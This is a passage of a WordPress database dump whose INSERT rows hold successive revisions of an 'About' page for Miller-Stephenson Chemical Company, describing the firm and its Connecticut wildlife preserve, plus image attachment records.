INSERT INTO `wp_posts` VALUES (206, 1, '2016-08-16 10:31:33', '2016-08-16 10:31:33', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:31:33', '2016-08-16 10:31:33', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (207, 1, '2016-08-16 10:31:50', '2016-08-16 10:31:50', '', 'miller-building', '', 'inherit', 'open', 'closed', '', 'miller-building', '', '', '2016-08-16 10:31:50', '2016-08-16 10:31:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/miller-building.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (208, 1, '2016-08-16 10:32:37', '2016-08-16 10:32:37', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:32:37', '2016-08-16 10:32:37', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (209, 1, '2016-08-16 10:32:54', '2016-08-16 10:32:54', '', 'about2', '', 'inherit', 'open', 'closed', '', 'about2', '', '', '2016-08-16 10:32:54', '2016-08-16 10:32:54', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/about2-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (210, 1, '2016-08-16 10:32:55', '2016-08-16 10:32:55', '', 'about5', '', 'inherit', 'open', 'closed', '', 'about5', '', '', '2016-08-16 10:32:55', '2016-08-16 10:32:55', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/about5-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (211, 1, '2016-08-16 10:32:56', '2016-08-16 10:32:56', '', 'about6', '', 'inherit', 'open', 'closed', '', 'about6', '', '', '2016-08-16 10:32:56', '2016-08-16 10:32:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/about6-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (212, 1, '2016-08-16 10:33:57', '2016-08-16 10:33:57', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:33:57', '2016-08-16 10:33:57', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (213, 1, '2016-08-16 10:34:35', '2016-08-16 10:34:35', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:34:35', '2016-08-16 10:34:35', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (214, 1, '2016-08-16 10:35:10', '2016-08-16 10:35:10', '', 'About Us', '', 'publish', 'closed', 'closed', '', '214', '', '', '2017-08-18 13:29:17', '2017-08-18 13:29:17', '', 0, 'https://132.148.10.86/wordpress/?p=214', 18, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (216, 1, '2016-08-16 10:36:53', '2016-08-16 10:36:53', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image title="Our Headquarters" id="207" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:36:53', '2016-08-16 10:36:53', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (217, 1, '2016-08-16 10:37:04', '2016-08-16 10:37:04', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image title="Our Headquarters" id="207"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:37:04', '2016-08-16 10:37:04', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (218, 1, '2016-08-16 10:41:21', '2016-08-16 10:41:21', '', 'miller (1)', '', 'inherit', 'open', 'closed', '', 'miller-1', '', '', '2016-08-16 10:41:21', '2016-08-16 10:41:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/miller-1-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (219, 1, '2016-08-16 10:42:07', '2016-08-16 10:42:07', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image title="Our Headquarters" id="218"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:42:07', '2016-08-16 10:42:07', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (220, 1, '2016-08-16 10:43:04', '2016-08-16 10:43:04', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" lightbox="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:43:04', '2016-08-16 10:43:04', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (221, 1, '2016-08-16 10:43:47', '2016-08-16 10:43:47', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="218"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:43:47', '2016-08-16 10:43:47', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (222, 1, '2016-08-16 10:44:12', '2016-08-16 10:44:12', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="200"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:44:12', '2016-08-16 10:44:12', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (223, 1, '2016-08-16 10:44:46', '2016-08-16 10:44:46', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:44:46', '2016-08-16 10:44:46', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (224, 1, '2016-08-16 10:45:17', '2016-08-16 10:45:17', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="Original" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:45:17', '2016-08-16 10:45:17', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (225, 1, '2016-08-16 10:45:33', '2016-08-16 10:45:33', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:45:33', '2016-08-16 10:45:33', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (226, 1, '2016-08-16 10:45:51', '2016-08-16 10:45:51', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:45:51', '2016-08-16 10:45:51', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (227, 1, '2016-08-16 10:46:20', '2016-08-16 10:46:20', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:46:20', '2016-08-16 10:46:20', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (228, 1, '2016-08-16 10:51:23', '2016-08-16 10:51:23', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="211" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:51:23', '2016-08-16 